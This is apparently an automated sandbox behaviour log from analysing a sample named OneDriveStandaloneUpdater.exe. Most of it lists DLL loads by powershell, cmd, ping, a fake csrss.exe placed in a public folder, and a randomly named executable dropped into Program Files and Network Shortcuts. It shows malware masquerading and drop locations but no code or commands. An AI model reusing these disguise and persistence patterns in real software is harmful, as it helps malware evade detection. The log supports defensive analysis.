Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: mscoree.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: version.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: profapi.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: ktmw32.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: rasapi32.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: rasman.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: rtutils.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: winnsi.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: propsys.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: dlnashext.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: wpdshext.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: edputil.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: urlmon.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: iertutil.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: srvcli.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: wintypes.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: appresolver.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: bcp47langs.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: slc.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: sppc.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Section loaded: version.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Section loaded: wldp.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Section loaded: profapi.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: mscoree.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: version.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: profapi.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: mscoree.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: version.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: profapi.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: ktmw32.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: rasapi32.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: rasman.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: rtutils.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: winnsi.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: propsys.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: dlnashext.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: wpdshext.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: edputil.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: urlmon.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: iertutil.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: srvcli.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: wintypes.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: appresolver.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: bcp47langs.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: slc.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: sppc.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\Public\Documents\csrss.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Section loaded: dlnashext.dll

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Directory created: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Directory created: C:\Program Files\Microsoft Office 15\ClientX64\ef091392c4842d	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Directory created: C:\Program Files\Windows Mail\MjlsqDcSPlv.exe	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Directory created: C:\Program Files\Windows Mail\ef091392c4842d	Jump to behavior

Source: OneDriveStandaloneUpdater.exe

